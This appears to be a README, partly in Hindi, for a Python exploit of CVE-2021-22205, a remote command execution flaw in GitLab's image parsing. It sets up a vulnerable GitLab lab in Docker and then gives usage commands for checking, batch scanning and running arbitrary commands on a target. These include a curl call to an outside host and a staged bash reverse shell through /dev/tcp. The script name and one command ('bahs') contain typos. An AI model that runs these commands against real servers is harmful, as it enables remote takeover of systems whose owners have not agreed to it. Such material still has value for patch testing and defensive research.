
CVE-2021-22205 के लिए Python एक्सप्लॉइट, छवि फ़ाइल पार्सिंग के माध्यम से GitLab CE/EE में एक दूरस्थ कमांड निष्पादन। भेद्यता जांच, बैच स्कैनिंग, कमांड निष्पादन और रिवर्स शेल का समर्थन करता है।
GitLab CE/EE के 11.9 से सभी संस्करणों में एक समस्या पाई गई है। GitLab फ़ाइल पार्सर को दी गई इमेज फ़ाइलों को सही ढंग से मान्य नहीं कर रहा था, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन हुआ।
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
python3 CVE-2021-2205.py

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"


python3 CVE-2021-2205.py -s true -f target.txt

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"


python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"


python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
